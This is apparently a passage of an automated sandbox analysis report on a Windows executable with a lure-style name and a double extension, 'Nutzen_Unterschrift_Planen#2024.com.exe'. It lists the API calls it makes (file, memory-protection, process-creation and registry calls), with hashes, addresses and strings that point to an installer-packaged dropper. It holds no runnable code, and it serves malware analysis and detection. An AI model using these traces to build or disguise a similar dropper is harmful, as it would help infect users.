                                                            • Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                            • Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                            • Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                            • Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                            • Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                            • Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                            • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                            • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                            • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                            • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                            • Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
                                                            • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                            • Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,00404054), ref: 00404237
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                            • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                            • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                            • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                            • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                            • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                            • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                            APIs
                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                            • String ID:
                                                            • API String ID: 4227406936-0
                                                            • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                            • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
                                                            • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
                                                              • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                              • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                            • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
                                                            • wsprintfA.USER32 ref: 00405F2A
                                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F65
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F74
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
                                                            • GlobalFree.KERNEL32(00000000), ref: 00406013
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040601A
                                                              • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                              • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %ls=%ls$[Rename]
                                                            • API String ID: 2171350718-461813615
                                                            • Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                            • Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
                                                            • Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                            • Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                            Strings
                                                            • *?|<>/":, xrefs: 00406545
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 004064F3
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-1762738896
                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404278
                                                            • GetSysColor.USER32(00000000), ref: 00404294
                                                            • SetTextColor.GDI32(?,00000000), ref: 004042A0
                                                            • SetBkMode.GDI32(?,?), ref: 004042AC
                                                            • GetSysColor.USER32(?), ref: 004042BF
                                                            • SetBkColor.GDI32(?,?), ref: 004042CF
                                                            • DeleteObject.GDI32(?), ref: 004042E9
                                                            • CreateBrushIndirect.GDI32(?), ref: 004042F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                            • Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
                                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                            • Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                            • MulDiv.KERNEL32(000C6DAF,00000064,000C6DB3), ref: 00402E20
                                                            • wsprintfW.USER32 ref: 00402E30
                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                            • Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
                                                            • Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                            • Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
                                                            APIs
                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                            • GlobalFree.KERNEL32(?), ref: 1000256D
                                                            • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                            • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                            • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                            • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 4216380887-0
                                                            • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                            • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                            • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                            • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                            • String ID:
                                                            • API String ID: 1148316912-0
                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                            APIs
                                                            • CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405BE9
                                                            • CharNextW.USER32(00000000), ref: 00405BEE
                                                            • CharNextW.USER32(00000000), ref: 00405C06
                                                            Strings
                                                            • fareafvrgende\Djrve27.gud, xrefs: 00405BDC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: fareafvrgende\Djrve27.gud
                                                            • API String ID: 3213498283-3469630132
                                                            • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                            • Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
                                                            • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                            • Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B52
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3355392842
                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                            • Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                            • Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                            • Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
                                                            • Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                            • Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC
                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                                            • CloseHandle.KERNEL32(?), ref: 0040587A
                                                            Strings
                                                            • Error launching installer, xrefs: 00405857
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                            • Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
                                                            • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                            • Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75D53420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
                                                            • GlobalFree.KERNEL32(008FA308), ref: 004038F9
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 1100898210-3355392842
                                                            • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                            • Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
                                                            • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                            • Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
